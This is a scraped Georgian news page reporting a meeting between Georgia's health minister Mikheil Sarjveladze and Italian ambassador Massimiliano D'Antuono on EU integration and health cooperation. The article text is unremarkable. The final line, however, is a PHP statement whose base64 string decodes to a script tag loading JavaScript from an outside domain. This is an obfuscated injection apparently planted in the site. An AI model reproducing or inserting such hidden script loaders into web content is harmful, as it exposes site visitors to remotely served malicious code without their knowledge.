celsiusi
ავერსი საქკაბელი

 ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრი მიხეილ სარჯველაძე, იტალიის რესპუბლიკის საგანგებო და სრულუფლებიან ელჩ მასიმილიანო დ’ანტუონოს შეხვდა.

ჯანდაცვის სამინისტროს ინფორმაციით, გაცნობითი ხასიათის შეხვედრაზე, მხარეებმა, საქართველოს შემდგომ ევროინტეგრაციასა და ამ მიმართულებით არსებულ გეგმებზე ისაუბრეს.

„ხაზგასმით აღინიშნა ორი ქვეყნის ჯანდაცვის უწყებებს შორის არსებული მჭიდრო და ეფექტიანი თანამშრომლობის მნიშვნელობა. მიხეილ სარჯველაძემ აღნიშნა, რომ იტალია საქართველოს საიმედო პარტნიორია და ამ ორ ქვეყანას, საერთო ევროპული ღირებულებები აკავშირებს. შეხვედრაზე, საუბარი შეეხო ორ ქვეყანას შორის არსებული თანამშრომლობის კიდევ უფრო გაღრმავების მნიშვნელობას, ჯანდაცვისა და სოციალური უზრუნველყოფის მიმართულებებით.

შეხვედრას იტალიის რესპუბლიკის საგანგებო სრულუფლებიანი ელჩის მოადგილე ფაბიოლა ალბანეზე და იტალიის საელჩოს წარმომადგენელი ელისა კაკო ესწრებოდნენ“,  – აღნიშნულია ინფორმაციაში.

144
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");